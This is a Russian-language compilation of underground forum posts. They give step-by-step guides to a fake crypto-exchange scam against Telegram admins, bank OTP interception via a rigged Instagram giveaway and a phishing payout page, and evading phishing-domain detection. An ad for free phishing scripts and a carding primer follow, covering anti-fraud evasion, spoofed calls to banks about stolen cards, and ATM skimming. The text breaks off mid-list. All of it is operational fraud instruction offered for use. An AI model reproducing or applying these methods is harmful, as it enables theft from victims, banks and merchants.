Расскажу два примера использования социальной инженерии на практике. Которые практиковал лично. На первом примере опишу как заработал 2000$ на скаме с двух человек (администраторов каналов телеграмм) за 3 дня, с помощью только СИ + Сайта под скам.
На втором примере опишу как с помощью СИ делал перехват OTP для входа в приложение нужного мне банка, по этому примеру можно в принципе перехватывать ОТР под разные популярные сервисы, банки и.т.д

Хочу заранее сказать, что второй пример с перехватом ОТР по моему мнению будет более интересен аудитории этого форума, поэтому лучше начните читать с него, в первом типичный описан скам как он есть и СИ там для используется по другому, более точечно на жертву.

• Пример первый «Скам, СИ + Фейк криптобиржа»

- Часть первая «Подготовка к скаму»
Я думаю многие из вас знают про вид скама с использованием своей фейковой криптобиржи. Суть такого фейка криптобиржи в чем: Вы можете рисовать баланс на аккаунтах в этой бирже и историю транзакций на всех аккаунтах, на своих, на аккаунтах жертв, отвечать от имени тех.поддержки и.т.д., короче говоря у вас есть полный контроль и ситуацию можно обрисовать на что фантазии хватит. При попытке вывести нарисованный баланс с нашей биржи будет выскакивать ошибка и сообщение с просьбой верифицировать внешний адрес биткоин на который пытаетесь вывести средства, а для верификации нужно отправить с этого внешного адреса бтк определенное количество битка на ваш аккаунт в бирже, тогда адрес верификацию пройдет и сможете сделать вывод.

Первое, что вы наверное уже подумали «знаем мы такой скам, школьный и паблик он вообще», так вот не спешите, я сейчас опишу как на таком вот паблике можно сделать пару тысяч долларов.
Что для этого нужно? Первым делом придумать ситуацию из-за чего у нашей будущей жертвы появится баланс на нашей фейковой криптобирже. Тут тонкая грань, нужна именно такая ЦА которая вроде бы и деньги имеет но за биток не особо шарит но и не боится его использовать при этом.
Я пришел к выводу, буду скамить владельцев телеграмм каналов, владельцев ютуб каналов, блогеров/блогерш в инстаграмм. Уже поняли как? Именно, я буду покупать у них оптом рекламу за криптовалюту.
Также вы наверное поняли почему именно эту категорию людей ? Потому что они в основном не работают с криптой, у них есть деньги, они не будут боятся использовать крипту, особенно при оптовом заказе где им сулит большой профит.

Так, вот мы выяснили ЦА, далее нужно придумать способ контакта с жертвой. Если насчет инсты и телеграмм можно не париться и писать прямо там в директ / ЛС от имени менеджера по закупке рекламы то с ютуб сложнее.
К этому моменту уже нужно примерно понимать под что вы будете якобы закупать оптом рекламу, я решил, что это будет браузер Vivaldi. А знаете почему? Потому что у вивальди можно создать почту с доменом @vivaldi.net, при этом на самом сайте vivaldi.net нет кнопки «создать почту» или «войти», топишь жертва которой мы пишем на почту с предложением оптовой покупки рекламы для браузера вивальди зайдет по домену нашей почты на сайт и увидит официальный блог браузера, без намека на то, что там может кто угодно сделать такую почту.

- Часть вторая «поиск жертв, англ и ру аудитория»
У вас должен быть готовый пример поста который вы будете давать на рекламу (В случае телеги / инсты)
С ютубом сложнее но все таки вы можете просто выискать настоящие рекламные материалы трастовой конторы от имени которой собрались закупаться. Для ютуба лучше всего пре-ролл найти если не получается найти то придется нарезать ролик про то, что вы рекламируете, сесть и придумать еще текст который под ваш ролик будет говорить ютубер у которого вы закупаетесь.
Я начал поиск жертв таким способом как и писал выше - ютуберам выписывал на почту от почты вивальди, выбирал англ аудиторию. Первое сообщение оформил официально, предложением рекламы нашего бренда Vivaldi, вопрос по поводу цены, скидки за опт. Также тут желательно подготовить договор на закуп рекламы, шаблоны можно найти в сети.
Админам телеграмм каналов я писал русским, стандартное начало общения, спрашиваю ценник, свободные места когда начинаются, могут ли сделать скидку при закупе рекламы на месяц (по 1 посту в день например, придумайте себе график который дадите менеджеру и торгуйтесь по поводу скидки, это придаст ему уверенности)

Когда все обсудили, график, цены, скидки (цена общая которую вы должны отправить человеку должна быть не меньше 2500$ в битках). Так вот, когда все обсудили и наша жертва заметно завелась в предвкушении крупного профита, самое время спрашивать не против ли оплаты в биткоинах. Почему такая оплата ? асЯ в эти моменты объяснил все тем, что слишком высокие налоговые сборы за рекламу, для оптимизации налогооблажения некоторую рекламу мы закупаем за биткоин. Также сообщаем, что поможем с выводом биткоина на карту / банк.счет, все обьясним и рекламу можно вовсе запускать только когда выведете деньги. Все комиссии на это дело мы покроем естественно.

- Часть третья «Скам, профит x2, x3 и.т.д»

Приведу сначала пример того, что вышло из моей затеи по телеграмму.
Выписывал я админам около 3-4 часов, не спешил, написал около 50 администраторам. Главная проблема заключалась в том, что многие на предложение принять оплату в битках начинали юлить, решается это тем, что вы во первых берете админов не самых крупных площадок (50-100к подписчиков норм, просто берите большой опт рекламы, чтобы сумма была заманчивая) во вторых добавляете официоза в виде присланного на почту админа договора (опять же, с домена vivaldi.net) В телеграмме мне в первый день попалась жертва, которой я естественно обьяснил, что нужно зарегать кошелек на телефоне, выводить на него, потом с него через обменник на карту. После регистрации жертвы, я нарисовал ей баланс на сумму по которой закупал рекламу, про вывод в обменнике она уже знала. Вот она пытается сделать вывод себе на кошелек установленный на телефоне, при выводе ошибка, жертва естественно пишет мне. Я отвечал, что не помню такого так как мой аккаунт с которого переводил вообще корпоративный и посоветовал написать в тех.поддержку биржи.

Жертва пишет, мы не сразу но через 1-2 часа от имени поддержки даем ответ, что вывод доступен на верифицированный внешний адрес БТК, так как ваш аккаунт не пополнялся с внешного адреса - у вас нет верифицированного внешнего адреса бтк для вывода. Чтобы верифицировать адрес внесите депозит на аккаунт биржи с того адреса на который хотите в дальнейшем делать вывод. Самое главное при общении от имени ТП писать точно также как ТП. Начинать с «Здравствуйте, спасибо, что обратились» и заканчивать «С уважением, поддежрка крипткоинваллей.ком», также в идеале, чтобы биржа была не Русская и от имени ТП вы соотвественно тоже общались не на русском. Я делал именно так.

Далее жертва может написать опять нам, посоветоваться, лучше всего тянуть время и говорить мол «погодите, уточню у других сотрудников» и через время писать, что мол да, все верно вам ТП сказала, нужно верифнуть внешний БТК депозитом. Мой первый депозит был по сумме 200$. После депозита от жертвы, она через час-два делает попытку вывода и снова видит ошибку, пишет опять нам в ТП. Тут мы начинаем включать фантазию, я говорил первое, что вы оплатили ровно 200$, а нужно было 200$+1%, чтобы адрес внешний верифицировался. И соответственно меняю текст ошибки при выводе, дописывая туда про 1%. Вам сейчас может показаться это глупо но поверьте, просто поверьте люди оплачивают После второй оплаты человек опять пытается вывести, опять ошибка, пишет в ТП. Я написал далее, что вы внесли неверную сумму, вот точная сумма в БТК которую вы должны были внести сумма BTC эквивалентная 204$, человек может поворчать один день но сделает третью оплату по итогу в 90% случаев. После этого жертва пытается опять сделать вывод средств, опять ошибка, пишет в ТП. Тут я уже включил тех.часть, так как у нас есть доступ к редактированию чего угодно на сайте, я редактировал сумму БТК которую написал в прошлом обращении жертвы, например если было написано 0.01232 BTC то я отредактировал на 0.12332 BTC и указал жертве, что она вновь внесла не точное количество БТК для верифа внешнего адреса. Таким вот образом мне удалось найти двух админов ТГ каналов, оба админа скинули мне в общем по 1к$ в бтк, один вроде около 800, а второй все 1000, скринов к сожалению не осталось, было дело года полтора назад. Время на их поиск + получение всех оплат от них заняло примерно 5-7 дней. Потом я забросил ибо меня рутина заебала быстро, очень трудно выискавать сначала каналы, а потом выписывать их админам.
После успеха с ТГ я забил на ютуб как-то однако до сих пор считаю, что при скаме таким образом забугор ютуберов можно очень неплохо навариться.

Пример второй «Перехват ОТП для популярных сервисов, банков и.т.д, с помощью СИ»

Сейчас расскажу еще из практики, как можно массово перехватывать ОТП для каких либо популярных сервисов, банков и.т.д, в общем с мест где требуется какая-то инфа (например номер карты, телефона) + ОТР.

Мне нужен был перехват для одного банка, в банке просили телефон, номер карты и ОТР после всех этих вбитых данных, вот как я решил это:
Делаем в инсте аккаунт, аккаунт оформляем под магазин, тематику магазина выбираете любую но лучше магазин электроники. Крутим 8-10 тыс.подписчиков (скорость ставьте небольшую), в течении недели выкладываем посты на тематику которую выбрали, по 3-5 постов в день будет норм. Посты лучше делать с лого магазина, это не сложно и быстро, через сервисы по типу Canva

После того как закончили оформлять профиль делаем рекламный пост, рекламировать будем конкурс, рекламировать естественно будем закупом у админов/блогеров рекламы, выбираем таких блогеров под ваше гео, чтобы его подписчики хотя бы в 60% случаем были пользователями сервиса/банка под который Вам нужно ОТР.

Конкурс наш может быть как выплатой на карту (банк/сервис который вам нужен) так и на технику(типа айфона, игровой приставки. Таких участников тоже можно в дальнейшем перевести на получение выплаты от нас для последующего перехвата ОТР) Главное, чтобы призовых мест было от 10 и выше. Например конкурс на 50.000$, 10 призовых по 5.000$ каждому.

В конкурсном посте указываем простые правила, написать в ЛС нашему аккаунту инстаграм + подписаться на нас. Дату окончания конкурса, как будет выбираться победитель и.т.д, все нужные детали.

Делаем в любом рандомизаторе запись видео как вы рандомом генерируете 10 чисел или 15, 20 ( смотря сколько у Вас призовых мест), видео сохраняем.

Когда в ЛС начали выписывать после рекламы люди желающие участвовать в конкурсе, скидываем им сертификаты участника, на каждом сертификате должен быть номерок, обязательно выигрышный (сделать можно по скаченному шаблону в MS office или в таких сервисах дизайна как Canva), каждому по очереди кидаем сертификат с выигрышным номером, с 1 по 10 сделанный сертификат или по 15 (смотря скок у вас призовых мест, по кругу кидайте сертификаты с выигрышными номерами, не кидайте всем один и тот же, это снижает конверсию в разы, люди могут быть друзьями/родственниками и.т.д), главное чтобы у всех был выигрышный номер.

Когда реклама прошла и подходит день подведение итогов конкурса (с этим к слову можно не затягивать, если реклама например сегодня, ставьте дату окончания конкурса через 1-2 дня), когда дата подошла - выкладываем пост с заранее записанным видео где вы в рандомизаторе получаете выигрышные номерки.

Люди будут видеть видео выложенное постом, проверять свой сертификат и писать вам, наплыв будет большой и постепенно будет стихать, писать будут и спрашивать как им получить свой выигрыш. Естественно каждый человек будет очень взвинчен и счастлив, что нам и нужно.

Теперь смотрите, если у Вас розыгрыш был на деньги и вам нужно ОТП для банка, делаем заранее фишинг платежки, фишинг якобы на получение выплаты, поля для ввода нужных вам данные + потом поле для ввода смс, якобы для подтверждения зачисления средств. (Я сделал из слитого на просторах сети скрипта, с отправкой данных в бота ТГ, просто переделал на нужные мне данные, вместо сбора скриптом карты+дата+цвв+смс я оставил карту+добавил телефон и после нажатия жертвой кнопки «получить выплату» я брал его карту+номер, вбивал в приложение нужного мне банка для входа и ждал пока жертва на фишинге введет ОТР)

Выглядело получение логов с фиша как-то так.

А потом код

С конкурсом на технику или что-то еще немного дольше и более забеывает из-за необходимого общения с большим кол-вом людей которые пишут.
Как сделать - сообщайте людям, что они должны оплатить большую сумму налога/таможни/доставки и оплату нужно делать заранее. Абсолютно все будут возмущаться, говорить, что вы мошенник или сразу будут спрашивать можно ли вместо приза перечислить его стоимость им на банк/карту, соглашаемся вместо приза отправить его стоимость победителям, говорим, что выплатить можем на сервис/банк который вам требуется и заранее соответственно готовим фишинг под это дело.

Вот собственно и все. Также в теории эту схему с трафиком и фишингом на ОТР можно использовать для сбора СС но я так не делал и хз какой конверт будет вообще. Хотя вру, по приколу в ручную у 5-7 человек просил фулл данные карты для выплаты, мне двое скинули помню из этих 5-7))

Надеюсь вышло интересно и главное полезно и по правилам конкурса, спасибо тем, кто дочитал хоть один из примеров до конца. Я конечно не топовый скамер или соц.инженер но постарался, описал то, что использовал сам и заработал на этом неплохо. Всем опыта, профита, счастья. И да, если где-то ошибки или задумался и написал какую-то инфу дважды в одном абзаце или еще что-то такое - заранее извиняюсь, перед публикацией глазами пробежался, пару моментов исправил но наверное не всё.

вопрос, как бороться с детектами фишинга от гугла(gsb) и не только, кроме как антибота, клоаки и обфускации скриптов и хтмл?

например есть красивый домен, на котором стоит фиш банка какой то страны (не юса) а так же клоака, антибот, клаудфлаер(?), обфуксация, вайт + с непостоянным онлайном.
как сделать, что бы домен жил долго и счастливо без алертов и делегирования как можно дольше?

Увидел тему тут на форуме, человек искал скрипты фишинг проектов, поэтому подумал почему бы мне не выгрузить то чем сам не пользуюсь.
То что выгружаю писал довольно давно, но скрипты рабочие, просто в основном без наворотов, не судите строго =)
Так по мере возможности буду выгружать скрипты на свой канал бесплатно: https://t.me/GB_Phishing
Буду благодарен за реакции в видел лайков за сторания. Всем успехов!

Привет! Угадайте о чём эта тема?
Все кто знает что-то об этом слове, можете сюда даже не смотреть.
Остальным: новички, мимопроходимцы, интересующиеся - стоит прочесть.
Если будет полезно, то скажите - выложу ещё часть.​

Вступление
Если вы думаете, что кардинг это сверхприбыльная тема — спешу вас разочаровать. Данная работа требует больших усилий, отдачи и наработок. Уже давно прошли времена, когда товары отсылались в любую точку мира. Сейчас это суровая борьба кардеров, магазинов, банков и держателей карт. Лучше несколько раз подумать, чем начинать заниматься этим делом. Большие заработки получают те, кто постоянно работает и имеет давние наработки в теме. Пользователи преуспевают только благодаря своему опыту, воли и усердности.

Основные понятия​

• Кардинг — мошенничество с банковскими картами. Существует в нескольких разновидностях: вещевой — покупка шмотья с последующей реализацией, онлайн — слив баланса с карты или БА на свои кошельки, офлайн — физическое дублирование банковской карты и снятие денег в банкомате или отоваривание в магазине.
• БА — банковский аккаунт или личный кабинет (ЛК).
• Стафф — скарженный товар.
• ДОБ — дополнительная информация о КХ (дата рождения, номера документов и т.д.)
• Скуп — лицо покупающее карженный товар на перепродажу.
• Дроп — подставной пользователь, который получает скарженный товар. Два вида: Разводные — люди, которых развели на принятие карженого товара, отличаются низким качеством, так как могут кинуть, и никто за них не будет ручаться. Неразводные — люди, которые в курсе, что им придет именно карженный товар, за них, обычно, ручается дроповод.
• Дроповод — человек курирующий дропов, может работать в паре со скупщиком, что очень удобно.
• Кардхолдер (КХ) — настоящий держатель карты (владелец карты всегда банк).
• Чарджбэк — процесс возврата средств, украденных с карты.
• Селлер — продавец.
• Материал — это карта со всеми данными о картхолдере и владельце. Как правило это может быть дата рождения, девичья фамилия матери, номера документов и т.д. Всегда можно уточнить, в каком формате продается материал.
• Рефаунд (реф) — жалоба магазину, что товар не дошел, при которой магазин повторно высылает товар за свой счет или возвращает деньги.

Примерная схема работы​

Итак, находим селлеров и покупаем у них материал. Далее заходим в онлайн- магазин, находим нужный нам товар в виде телефона или кольца на пол руки, заказываем и оплачиваем купленной картой.

Не все так просто, как может показаться и на каждом этапе нас могут ожидать подводные камни. Один из сложных этапов ― антифрод система. Это такая система, которая пытается определить действительно ли это владелец карты проводит операцию или это очередной аферист. Данная система сравнивает IP-адрес, отпечаток системы, часовой пояс, языки и другие параметры. Например, если какой-то Майкл Смит живёт во Флориде и хочет купить часы, а его IP с России, язык российский и часовой пояс по Москве, то понятно, что никто такой заказ не отправит. Далее нужно подумать о дропах. Заказывать на свой адрес очень большая авантюра. Поэтому нужно искать проверенных дропов, которые также возьмут свой процент. Есть очень много центров приема и отправки посылок, но они уже внесены в большинство черных списков всех популярных шопов. Поэтому так заказать не выйдет. Это еще один важный этап, который требует затрат.

---

Направления, виды работы

Десять направлений в Кардинге.

Первое направление - вещевуха.

Вещевуха это закуп различных физических вещей за чужой счёт с последующей их продажей. Можно как заказывать товар на себя (естественно не сразу, а через посредника, дропа и т.д.) и продавать самому в своей стране, можно заказывать товар на скупа. Скупы это такие чуваки которые принимают скарженный товар и выплачивают кардеру процент от этого. Плюс этой темы что довольно много бабок здесь крутится, минусы в том что есть доставка и с этим этапом есть разные проблемы. То развернут посылку, то дроп кинет или к нему полиция придёт.

Второе популярное направление это авиа/жд билеты и отели.

Даркнет пестрит объявлениеми об отдыхе за полцены или даже дешевле. На самом деле кардеры просто оплачивают этот отдых чужими бабками) Тема интересная, нюансы там в основном чтобы найти дающий сайт продающий билеты (напрямую вбить на сайте авиакомпании почти нереально) и чтобы платеж не отменили как можно дольше. Риски - крупные.

Третье направление - вбив самому себе.

Суть в том, что ты создаешь какой-то магазин и продаешь там товар и вбиваешь этот же товар и пиздишь деньги пока не пришел чарджбек. Способ интересен cool доходом, около 90 процентов, но велик и риск потратить бабки, т.е. чарджбэк пришел, а деньги снять не успел. И еще это сложная штука в плане реализации, надо грамотно все этапы соединить, иначе ничего не получится.

Четвертое направление – вбив в казино.

Пользователи вбивают баланс в казино и проигрывают в покер самому себе под другим аккаунтом. Это лишь один из примеров, а так вариантов работы с казино много. Плюс в том что тоже cool доход, но и fuckup можно и оставить все бабки в казино. Надо очень хорошо знать как настроить систему для работы, чтобы успешно заниматься подобным.

Пятое направление – вбив е-гифтов.

Плюсы этой темы в высокой доходности и быстроте, не надо fuck с доставкой и дропами, скупают гифты от 50 до 80 процентов. Минус в том, что тема замастурбирована и сами суммы небольшие, а так тема cool!

Шестое - вбив в букмекерские конторы.

Тема очень похожа на казино, только ставим не на карточные комбинации, а на спорт. Но есть много нюансов. Например, в большинстве БК можно вывести деньги только туда, откуда ты пополнял, но есть обходные пути. Сначала с одной карты пополнить, поиграть, со второй карты пополнить и уже туда вывести.

Седьмая тема – вбив в онлайн-игры.

Это покупка за чужой счёт какой-то игровой валюты с дальнейшей её перепродажей на сторонних сайтах, либо ключи какой-то игры, либо игровые предметы. Способов много, тема интересная и высокодоходная.

Восьмая тема – вбив в платежные системы.

В ебей вбивать это тупо, тем более акки от нее легко найти с балансом, но есть незабитые системы в которые можно вбивать с карты и уже оттуда тратить или переводить средства. Сюда же можно отнести вбив мобильных операторов, откуда деньги в дальнейшем выводятся на другие платежные системы.

Девятое направление – банковские заливы.

Это глобальная тема, где крутятся большие финансы. Этим как правило занимаются те кто имеют свои ботнеты, т.е. сеть зараженных чужих устройств в своём подчинении. Они просто угоняют банковские аккаунты и выводят оттуда средства на левые счета, после чего отмывают и забирают себе. Плюс в том что денег там много, а минус в том, что надо серьезно вложиться, чтобы войти.

Ну и последняя, десятая тема - кардинг в реале.

Успешные игроки с колодой в 52, берут данные о карточках и делают их копии, а дальше снимают средства в банкомате или закупаются в магазинах. Плюсы в высокой доходности, т.к. при таких условиях можно взять деньги с карты под ноль. Минусы в том, что нужны затраты на оборудование и знание как работать с ним, чтобы получалось делать нормальные копии. А еще, конечно, глобальный минус в том, что высокий риск быть пойманным.

(Направлений в кардинге просто дохера, каждый может найти что-то своё, что я вам и желаю, друзья, если хотите заниматься этой темой)

---

Настройка системы под вбив

Идеальным вариантом считаю отдельно выделенный ноут с windows 7(eng) + оплаченная сфера и 911 носки.
Разберем 3 варианта.

1. Впн на основе + 911 на основе + виртуалка (WMware/VirtualBox)

Плюсы:

+ Все собрано в одном месте, не потеряешь не запутаешься

+ Перестаешь боятся "левых глаз". В любой момент копию вирты можно удалить.

+ Доп траты не нужны, потребуется лишь вирта+торрент анг винды

Минусы:

-Некоторые шопы, типа амазона могут палить вирту, что накинет доп фрод очков

-Привыкай к лагам и тормозам, их будет достаточно

-Вопрос удобства, но тут уже лично свой минус

2. Впн+911+Основа + portable browser(firefox/chrome)

Плюсы:

+ Работаешь с основы, никаких лагов никаких просадов и вылетов

+ Очень быстро понимаешь что и где. Врубил носок, вставил куки и вперед.

Минусы:

-В частности тебе придется вырубать WebRTC, т.к. сама суть портабл браузеров - не пускать сайт дальше самого браузера. Сказывается на фроде.

3. Впн на основе+911+основа+сфера

Плюсы:

+ Полная подстройка системы под кх.
Если лог не из стран третьего мира и есть обширный выбор хороших носков, то % вбива при такой машине подлетает до 90

+Удобство. Все собрано в одном месте, только тут это уже один браузер.

Минусы:

-Как это не грустно,но если ты хочешь работать по вещевухе, то привыкай что какие-то шопы могут палить твою сферу.

-Ценник для новичка будет кусающимся + платишь ты в месяц ,а не разово.

---

Мерчанты и платёжное поведение

Каждый день мы сталкиваемся с гейтами и мерчантами. Разнообразие и модификации будоражат голову.
Может случиться такое, что в двух разных шопах будет один и тот же мерч, но, на разных лицензиях/расширениях или по разному настроен.
Как вы угадываете, какой мерч стоит в шопе? Смотрите исходный код? А может быть добавляете в корзину и смотрите ее интерфейс? builtwith.com?
Да, по сути своей builtwith может помочь, в случае есть шоп не использует корзину, скоринг и мерч от разных девелоперов. В противном, он покажет в заветном окне E-Commerce разработчика корзины. Что ближе, то и будет светиться. По факту, там может стоять шопифай или пп, а корзина бигкоммерса, что он и покажет.

Shopify​

Данный мерчант по истине самый продвинутый и жесткий по отношению к фроду.

Из коробки имеет кучу систем визуализированных в админке, оргомную базу шаблонов для разработки интерфейса, несколько вариантов бесплатных шоппинг карт + платные, чуеву долину подключаемых скоринг и АФ плагинов именных+от сторонных разработчиков и третьих мерчантов.
Менеджер шопа или департамент верификации в режиме онлайн получает уведомления в админке о том, сколько юзеров на данный момент серфят, что каждый из них смотрит, какие действия производит и все данные юзера.

Начиная от стандартных типа айпи, версия ОС, местолопожение, сервисы и тд, заканчивая кликами, просматриваемым товаром, временем затраченным на каждое действие и пр.
В общем, абсолютно ВСЁ, что вы делаете.
В режиме ОНЛАЙН вериф может провести аналитику ваших данных уже на этапе заполнения.
Например, проверить, были ли ордеры с данного айпи адреса и данных типа аудио и фингер принтов, расшаренного вебртц и проч, что подменяет Linken Sphere.
В режиме онлайн средства скоринга и АФ рассчитывают ваш рейтинг, давая графические показатели менеджеру о том, кто находится по ту сторону монитора. Как правило, не ошибается.

Если учесть, что Shopify это не только абсолютно готовое решение для размещения шопа, котрое работает из коробки не требуя доролнительных вмешатьльств, так еще и самый защищенный поставщик, давайте по пунктам его методы детекта:

1. Проверка е-маил адреса по собственной базе и базе партнерских мерчей на количество ордеров с рассчетом вероятности фродовой транзакции на основе прошлых данных. Если ордеров с данной электронной почты нет ни в одном мерче - это уже минус по скорингу.
2. Проверка расстояния между шиппинг и биллинг адресом.
3. Проверка точного совпадения AVS (Address Verification System) по биллингу и проверка по блэклистам
4. Скоринг на основе анализа данных, передаваемых браузером на совпадение или несоответствие.
5. Принадлежность айпи провайдеру стационарного интернета либо мобильного
6. Проверка поведенческой активности в шопе и сопоставление данных с массивным обьемом информации предоставляемой партнерскими скоринг системами
7. Дистанция между геолокацией айпи, шиппинг и биллинг адресом + геолокацией из браузера
8. Анализ перехода, глубины и кол-ва кликов.

Как можно представить, это далеко не все возможности и заслуги мерчанта.

Кстати, не совсем верное утвеждение, что шопифи - мерчант.
В более чем 70% это всего лишь поставщик АФ и скоринг решения со своей формой и шоппинг картой, передающая данные чекаута на гейтвей Authorize.net, который мы рассмотрим дальше.

Authorize.net​

Самый легкий в плане вбива мерчант - гейтвей.
Почти не имеет подключаемых решений сторонних разработчиков.
Все, что использует для отсеивания фродовых транзакций:

1. Проверка совпадения АВС
2. Проверка расстояние между айпи и холдером
3. Блеки на айпи и чек прошлых ордеров если такие были с этого айпи
4. Чек холдера на прошлые чарджи, платежное поведение и транзы по данным карты
5. Чек номера телефона по паблик рекордс в автоматическом режиме
6. Чек принадлежности бина к стране, где делается покупка.

Остальное, что использует мерчант - нам никак не мешает!

Самое главное и интересное - авторайз моментально списывает бабки с карты после аппрува, что нам на руку.
Не нужно беспокоиться, есть ли на карте деньги, стоят ли лимити. Если ордер прошел, значит кэш списан в строну магазина.
Но, расслабляться не стоит. Авторайз может стоять как платежное решение, но корзина и скоринг могут стоять от шопифи. Так что, не радуйтесь сразу видя такую бляшку.

Big Commerce & Woo-Commerce​

Данные мерчанты по своей сути почти одинаковы.
Используют одни и те же решения, отличаются лишь в интерфейсе.

Собственные средства абсолютно не эффективны и на момент декабря 2018 года еще можно встретить маленькие шопы с шаблонным интерфейсом, которые не используют абсолютно никакого скоринга и сторонних решений АФ.

Все, что они могут сделать, так это:

1. Проверка АВС
2. Расстояние между айпи и холдером
3. Скоринг по параметрам хуманизации

Чек введенной информации в паблик рекордс.
На первый взгляд - ничего сложного.
Но, шопов доверяющих данным поставщикам е-коммерции пересчитать по пальцам одной руки.
Встроенная поддержка плагинов сторонних разработчиков дает огромный плюс в работе с данными систмами.

Возвращаясь к шопифи, мы можем применить все параметры детекта к Биг и Ву - коммерсу.
Зайдя по линку ЛИНКУ вы можете посмотреть все доступные решения для противостояния фроду.
Эти же плагины без проблем прикручиваются к первому мерчу из нашего топа - Shopify.

Не буду дублировать методы детекта, так как они идентичны первому варианту.

Собственно, рассмотренных 4 мерчанта самые распостраненные при вбиве в США.

Из всего вышеописанного, хочу подвести небольшой итог.
Не смотря на то, какой мерчант или платежный шлюз используется в шопе, никогда не пренебрегайте правилами успешного вбива. Вы никогда не знаете наверняка, скоринг система какого разработчика следит за вами на данный момент.

Если у вас не прошел платеж, но карта 100% валидна - это значит лишь то, что вы набрали слишком много фродбаллов. За исключением мелкого количества ситуацией, когда банк просто на просто отклонил транзу или залимитил карту.
НЕВОЗМОЖНО убить карту правильным вбивом так же, как не возможно залимитить ее (относится к случаю, когда платежное поведение соответствует и на карте достаточный баланс).
Если после чекаута карта заблокировалась или улетела во фрауд депт, это значит, что платежный шлюз передал банку информацию о том, что транзакция фродовая.
В случае, если ордер прошел но позже прилетел кенсл это значит лишь то, что в данном магазине все заказы верифицируются вручную!

Платежное поведение​

Это будет коротко, но по делу​

Друзья, а вы знаете, что "пользоваться телефоном" в нашей работе синоним слову "повысить шансы на успех"?
Покупая подписку на сервис с подменой номера звонящего - вы экономите деньги на карты и увеличиваете свой профит.

Ходит такое поверие, что можно купить карту самого высокого класса и успешно вбить часы ролекс за 100.000 долларов.
Пусть даже там будет баланс в 1.000.000 долларов, банк может заблокировать карту.

Было ли у вас такое, что вбивая на сумму в 1000 долларов - получали отказ на премиальном уровне карты.
Но, вбив в другое место гифт на 100 долларов - все проходило гладко как по маслу.

Спрашивается, почему? Там же баланс 10.000

Изначально заострю внимание, что банку и шопу плевать на вас. Им не важно, сколько вам лет, что вы заказываете иксбокс или вертолет на радиоуправлении в свои 90 с хвостиком. Не играет абсолютно никакой роли для шопа, какая сумма заказа. Главное, чтобы были деньги на карте и успешно пройдена авто-ручная верификация + скоринг и АФ.

Что же важно и почему не проходят ордера на высокие суммы? Что делать? Ведь я купил карту уровня инфинити:
Вместе в картой любого уровня, ты просто ОБЯЗАН пополнить себе аккаунт в сервисе подмены номера и пробить ссн-доб холдера.

Зачем?

Click to expand...

Звонить в банк перед КАЖДЫМ крупным вбивом.

В подавляющем большинстве крупных и не очень банков, для того, чтобы узнать баланс и историю последних операций нужно лишь позвонить с биллинг номера и в тональном режиме набрать номер карты и зип.
В отдельных случаях понадобится ССН и-или ДОБ.
В очень редких случаях понадобится разговор с оператором лично либо предоставление ответа на секретный вопро или ввод пин-кода.
Звоним по номеру банка, который заблаговременно находим в интернете по запросу

"%bankname% balance check phone number"

Попадаем на автоматизированную систему и следуем инструкциям. Вводим номер карты и допустим ЗИП код.
Айвиар говорит нам актуальный баланс собственных средств и кредитного лимита(если есть).
Нажимаем в тональном режиме циферку, к которой привязана история транзакций(слушаем айвиар).
Тут то мы понимаем, когда нам перечисляют историю трат, что холдер не имеет транзакций на большие суммы.
Максимально слышим списания в 200-300 долларов за одну транзакцию.
Хоть у нас и не имеется полного понимания картины, так как автоматически выдается только 5-10-20 последних транз(зависит от банка) но мы все равно можем предположить, сколько в среднем тратит за месяц холдер.

А это значит, что банк будет автоматически блокировать транзакцию на единовременную покупку по сумме выше чем
СРЕДНЯЯ месячная трата.
Примерно так.

Естественно, что при сумме списаний в 1000 долларов за месяц небольшими транзакциями по карте холдера - банк просто на просто не даст вам сделать единовременную покупку на сумму в несколько раз превышающую.
Это не типичное платежное поведение, подозрение на фрод. Среднестатистический холдер позвонит в банк и предупредит о такой большой оплате.
В лучшем случае, банк просто откажет вам в оплате и шлюз даст деклайн.
В худшем карта улетит во фрод (можно вытащить) либо заблокируется с принудительным перевыпуском.

---

Самые популярные способы воровства с кредитных карт

Способ первый

Зачастую мошенники используют устройства, которые, будучи установлены на банкомате, помогают им получить сведения о карточке. Это могут быть установленные на клавиатуры специальные "насадки", которые внешне повторяют оригинальные кнопки. В таком случае владелец карты снимает деньги со счета без всяких проблем, но при этом поддельная клавиатура запоминает все нажатые клавиши - естественно, в том числе и пин-код.
Совет: внимательно изучите клавиатуру незнакомого банкомата, прежде чем снять деньги со счета.

Способ второй

Другое устройство - то, что англичане еще называют lebanese loops.
Это пластиковые конверты, размер которых немного больше размера карточки, - их закладывают в щель банкомата. Хозяин кредитки пытается снять деньги, но банкомат не может прочитать данные с магнитной полосы. К тому же из-за конструкции конверта вернуть карту не получается. В это время подходит злоумышленник и говорит, что буквально день назад с ним "случилось то же самое". Чтобы вернуть карту, надо просто ввести пин-код и нажать два раза на Cancel.
Владелец карточки пробует, и, конечно же, ничего не получается. Он решает, что карточка осталась в банкомате, и уходит, чтобы связаться с банком. Мошенник же спокойно достает кредитку вместе с конвертом при помощи нехитрых подручных средств. Пин-код он уже знает - владелец (теперь уже бывший) "пластика" сам его ввел в присутствии афериста. Вору остается только снять деньги со счета.

Способ третий

Технически сложно, но можно перехватить данные, которые банкомат отправляет в банк, дабы удостовериться в наличии запрашиваемой суммы денег на счету. Для этого мошенникам надо подключиться к соответствующему кабелю и считать необходимые данные.
Учитывая, что в Интернете соответствующие инструкции легко обнаружить в свободном доступе, а технический прогресс не стоит на месте, можно утверждать: такой вариант будет встречаться все чаще.

Способ четвертый

Для того чтобы узнать пин-код, некоторые аферисты оставляют неподалеку миниатюрную видеокамеру.
Сами же они в это время находятся в ближайшем автомобиле с ноутбуком, на экране которого видны вводимые владельцем карты цифры. Вводя пин-код, прикрывайте клавиатуру свободной рукой.

Способ пятый

Дорогостоящий, но верный на все сто способ.
Бывают случаи, когда мошенники ставят в людном месте свой собственный "банкомат". Он, правда, почему-то не работает и, естественно, никаких денег не выдает. Зато успешно считывает с карточки все необходимые данные.
А потом выясняется, что вы вчера уже сняли все деньги со счета и почему-то не хотите этого вспомнить!

Способ шестой

В свое время мошенники из ОАЭ устанавливали в отверстия для кредиток специальные устройства, которые запоминали все данные о вставленной в банкомат карте. Злоумышленникам оставалось только подсмотреть пин-код либо вышеописанными способами первым и четвертым, либо банально подглядывая из-за плеча. Ну, понравилось местному аборигену ваше кольцо, или ваши часы, или что- то там еще...

Способ седьмой

